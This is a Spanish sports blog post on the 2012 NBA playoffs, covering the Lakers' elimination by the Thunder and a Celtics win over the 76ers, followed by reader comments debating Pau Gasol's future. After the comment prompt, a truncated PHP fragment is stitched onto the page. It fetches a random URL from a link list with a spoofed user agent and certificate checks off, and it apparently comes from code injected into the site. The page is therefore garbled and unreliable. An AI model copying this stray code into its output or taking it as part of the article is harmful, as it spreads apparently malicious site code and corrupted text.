La Crónica: Camino de semifinales

22 de May de 2012 por TheDeerHunter

Se confirma la eliminación de Lakers. Cómoda victoria final de Thunder, extendiendo el guión de toda la serie (90-106). Por méritos propios o ajenos la supuesta superioridad interior de los amarillos no se ha dado. Anoche 51 rebotes frente a 35 y eso que 16 fueron de Pau. 3 ridículos rebotes ofensivos por nada menos que 14 de Ibaka y compañía. La exageración de 30 puntos encajados al contragolpe…

Lamentable cierre de curso de Ramon Sessions, la engañosa última esperanza amarilla, y qué decir de la nulidad del banco. Kobe culminaba una excelente serie individual pero de discutidos efectos colectivos. No nos ponemos de acuerdo si fue antes el huevo o la gallina, pero se ha visto excesivamente solo en los mejores y peores momentos del equipo. Muchos apuntan a que ellos mismos (Brown, Kobe y el propio Kupchack) se lo han buscado.

El mérito de Thunder ha sido anular los recursos ajenos donde podían ser vulnerables y hacer sangre donde podían. Durant y Westbrook volvían a resultar imparables, su segunda unidad se mostró superior y un dato aún más sangrante: 20 asistencias contra 12 de Lakers, uno de los puntos flacos del equipo amarillo. A partir de ahora unos de cabeza a la reconstrucción y otros a lo que puede ser la final anticipada de la NBA.

En la acera de enfrente solvente victoria de los Celtics en el Garden (85-101). Vimos pocas de las virtudes que provocaron la machada de Sixers en el anterior choque. Estuvieron flojos Williams, Young e Iguodala y aún tuvieron suerte de disfrutar de la mejor actuación de Brand&Hawes. Los Celtics aprovecharon una actuación casi sobrenatural de Brandon Bass. Si él y Stiemsma te hacen un roto de tales proporciones en un partido como éste es que algo falla. Es posible que lo del otro día tenía bastante de espejismo.

PREMIOS

MVP: Primero fue el ‘Big Three’, luego el ‘Big Four’ y el que se sale en el quinto partido es el jugador con menos glamour del quinteto de Boston. Brandon Bass se fue hasta los 27 puntos, incluyendo 18 en el tercer cuarto. Los Sixers aún le están buscando.

Rookie: 12 puntos con un 6 de 6 en tiro para Lavoy Allen. Al final va a resultar ser un jugador aprovechable.

Sorpresa: Sin duda, la actuación de Brandon Bass.

Decepción: Hoy podemos repartir. Andre Iguodala y Lou Williams no jugaron uno de sus mejores partidos (6 de 20 y 17 puntos entre ambos), Andrew Bynum se paseó por la cancha como un alma en pena (10 puntos y 4 rebotes) y Ray Allen demostró que no ha llegado a los playoffs en las mejores condiciones físicas (5 puntos).

Esfuerzo en vano: 42 puntos de todos los gustos y olores y además con un buen porcentaje de acierto (55%). Más ya no puede hacer Kobe Bryant. 

Imágenes | AP Photos / Getty Images

Comenta

56 comentarios a esta entrada

  1. Esteban dice:
    #1

    q diga que pau debe salir de lakers no significa nada, mucho menos desmerecerlo como jugador, solo soy objetivo, va a ser dificil encontrar algo bueno por el salvo una trade exeption

    y digo por que

    los jugadores que cobran como gasol, los hay de dos tipos, los demasiados buenos y los demasiado malos

    por el dinero q cobra, entre los buenos entraria love, howard, deron, cp3, rose, durant, lebron, wade,

    a principio de temporada pàu podia mirarse cara a cara con cualquiera de ellos, de hecho se hizo el trade entre pau y cp3, pero un año bastante flojo, dos PO malos realmente de pau y de su equipo, le han terminadod por bajar el cartel, POR MAS QUE AMEN A PAU DEBEN RECONOCER QUE NO SE DARA UN TRADE POR ESTOS TIOS, de hecho a mitad de temporada se intento con deron y los nets lo rechazaron, incluso dudo que los knicks entreguen a carmelo

    y los muy malos, donde entran jj jhonson (con contrato de 20 millones hasta los 35), boozer y su contrato de 20 millones por varios años mas, amare y sus 60 millones en 3 años sin seguro por sus rodillas, lewis q es lewis, brand y sus 10 p y 5 rebotes por partido,

    es decir q pau para mi bajo un peldaño de entre las estrellas, pero sigue siendo mejor que las NO estrellas que se hicieron contratos millonarios

    creo que a los lakers les convendria hacerse con una trade excepcion que les de libertad de movimiento que buscar un trade, donde no hay jugadores que puedan mejorar a pau

      Citar

  2. GreenPride dice:
    #2

    Se acabó lo que se daba para los Lakers. Tras una temporada que empezó mal con el frustrado traspaso de Pau y llegada de CP3 y con la marcha de Odom, los de LA han ido teniendo una temporada extraña en la que siempre parecieron un punto por debajo de sus posibilidades.
    En este partido el juego rápido de los Thunder les ganó la partida ante unos Lakers que fiaron todo a Kobe que anotó con grandes porcentajes pero se ha demostrado que él sólo no puede.
    A los Thunder les espera ahora una apasionante serie contra San Antonio.
    A los Lakers ya veremos el camino. Mike Brown ha demostrado lo que muchos ya sabíamos tras sus años en Cleveland, es un entrenador que crea buenos entramados defensivos pero ofensivamente sus equipos son espesos, se dedican a darle la bola a su estrella e infrautiliza jugadores muy válidos a los que saca de sus mejores posiciones y posibilidades de rendir, este año claramente Pau el gran damnificado. Da toda la impresión de que no ha sabido sacar todo el rendimiento de una plantilla que podría haber jugado mucho mejor.
    Pau tampoco se puede ir de rositas. Su temporada ha ido de más a menos y ha acabado realmente mal en estos PO. Fuera de sitio y perdido en el ataque de los Lakers, su falta de confianza le ha hecho tomar decisiones muy equivocadas cómo la que provocó la pérdida decisiva del 4º y casi nunca ha conseguido ser ese segundo espada para su equipo, también influenciado porque Brown otorgó ese papel a Bynum. Ahora queda saber qué le deparará el futuro a él y a su equipo. Lo lógico sería que este verano hubiera un traspaso que sacara a Pau de LA y con el que los Lakers intentaran rejuvenecer el equipo y dotarle de un par de jugadores o tres de calidad, sobre todo ese base que echan tanto en falta (gran decepción con Sessions) y gente que les de piernas jóvenes. Veremos cómo se da el verano
    Y en Boston la vieja guardia céltica lo volvió a hacer. Esta vez sin Bradley al que tuvieron que dar descanso por sus hombros, con Ray muy tocado de su tobillo y con unos Sixers que amenazaban en la primera parte con asaltar de nuevo el Garden. Pero ahí se pusieron los Celtics a defender y defender, el mal ataque estático de los Sixers perdió balón tras balón y Rondo se hizo el amo para asistir una y otra vez a un Bass desatado que machacaba el aro una y otra vez. Sigo diciendo que Bass es clave en el ataque celtic ya que con él metiendo tiros, se hace muy difícil defenderles ya que los 5 pueden tirar en cualquier momento casi desde cualquier sitio. Gran partido de nuevo de Garnett y aunque parezca mentira los Celtics que están a un partido de estar en las finales de conferencia. Parece difícil que esta aventura les pueda llevar más lejos pero cada día sorprenden de nuevo. Veremos si consiguen acabar con esta serie a la que me da la impresión que todavía le queda mucha tela que cortar.

      Citar

  3. sempren dice:
    #3

    En ese sentido creo que sería muy interesante para los Celtics acabar con la serie lo antes posible, y confiar en el Canseco para que los Pacers alargasen la eliminatoria, no tanto por el cansancio ajeno como por el descanso propio. Con un par de días de descanso creo que harán sudar a los Heat, sin él no les veo tantas opciones

      Citar

  4. Ru dice:
    #4

    De vuelta de la boda,para no repetirme citaré lo comentado por rumbero,en el que estoy totalmente de acuerdo en esta opinión:

    rumbero: Es que no es dar un salto, es ganar dos anillos. Y eso está ahí, no se saca de contexto nada. Claro que un Boozer, Amare o Bosh hubieran subido el nivel de esos Lakers, eso es de cajón, pero de ahí a ganar dos campeonatos? Estos señores lo han conseguido con sus respectivos equipos? (Y no me vengas con que ese Lakers eran ya un equipazo que solo les faltaba un buen 4, la importancia que tuvo Gasol fue acojonante). El problema es que pones a Gasol en el saco de los Boozer, Amare & Co cuando seguramente esté más cerca de los Garnett, Nowitzki y Duncan, y lo digo sin ningun tipo de fanatismo españolito, de verdad te lo digo.
    El trade no fue equitatitivo, estoy de acuerdo, y los dos últimos años de Gasol han sido malos, también estoy de acuerdo, como lo han sido de los Lakers y no creo que solo haya sido culpa suya. Pero hay que tener una visión global. Que le den las gracias, dos besos, y los manden para Chicago a ver si les da el salto de calidad que necesitan

    Es más,para el entramado ofensivo de Phil Jackson,que Pau fuera (y sigue siendo) un jugador con gran sentido del juego fue fundamental para la consecución de los dos títulos y la final del año de su traspaso.Ninguno de los 3,Boozer,Amare o Bosh tuvieron ni tendrán en sus respectivas vidas esa capacidad de Pau.Mención especial para su segundo anillo,quinto de Kobe,en el que para mí,Gasol fue el MVP de las finales.

    Pero claro está que Pau también ha bajado sus prestaciones físicas y sobre todo a nivel mental,y con ellos la psíquica del equipo desde la temporada pasada y alcanzando su cénit en esta campaña.Dudo mucho de la capacidad de Mike Brown para “enchufar” a su equipo,creo que se limita a lo táctico y el factor motivacional no lo toca o no sabe manejarlo,así de claro.Así que en sus equipos sólo queda la autogestión,pasó en Cleveland donde LeBron y su apetito voraz de competición tiró del grupo,y ha pasado este año en los Lakers donde más de una vez hemos visto a los jugadores dándose indicaciones.Impresiones propias pero Gasol ha sido el que más lo ha notado,ya sea por su relegada función en ataque,por no saber él mismo gestionar ese cambio en el equipo o por el “desprecio” que le hicieron al querer traspasarlo….

    Es un contrato incómodo pero creo que hay equipos que pueden estar interesados,y más de uno y más de dos,pero lo que está claro que como Laker no va a mejorar,pero sigue siendo un pepino de jugador,no al nivel de los más grandes pero más que válido segunda espada,al menos las dos temporadas que tiene firmadas en la NBA.

      Citar

  5. MagicJohnson32 dice:
    #5

    Sancho88:
    Me quedo con nuestras discusiones y aportaciones, porque me encantan más que comer paella los domingos, pero hay que reconocer que este artículo es genial, algo que yo no esperaba de Ramón Trecet a estas alturas, donde ya le veía más como un demente que como un periodista. Para mí, resucita con este artículo

    http://www.marca.com/blogs/13t/2012/05/22/pau-gasol-su-futuro.html

    Es esto a lo que me refería con reflexionar bien bien sobre la situación, y me encantaría que los seguidores Laker me dieseis una opinión parecida o un análisis de los hechos, porque yo me quedado flipado con el mal ambiente en general, tipos que metían un canastón tras asistencia de otro y ni siquiera se miraban… qué leches ha pasado ahí? Da la sensación que desde que se fue Phil eso es una casa de putas.

    ¿Crees que el ambiente era mejor el año pasado, con Phil en el banquillo? ¿Crees que los Lakers jugaron mejor el año pasado, con una plantilla claramente superior?

    Trecet hace una cronología pero se deja muchas claves. Prometo que haré un artículo sobre los Lakers, un balance de la temporada y, sobre todo, una previsión de lo que viene.

      Citar

  6. Sancho88 dice:
    #6

    Me di cuenta de lo que comentas de Trecet hace algunas horas, porque se olvida en su artículo de algo fundamental: y es que Pau pasaría automáticamente a subir un 7% su salario de ser traspasado a otro equipo, por tanto su valor de mercado no es el que marca Trecet en su blog, sino un 7% mayor sobre el montante total, que vendrían a ser casi 40 millones, y con la subida porcentual serían prácticamente 3 millones más de euros, o sea, 43 millones a cobrar en dos temporadas.

    Cuando me enteré de eso, automáticamente le quité la validez moral al artículo.

    Me reafirmo en que aquí se tiene mucha más sabiduría que en el blog de ese señor, y ese detalle deja bien claro esta idea que comento.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>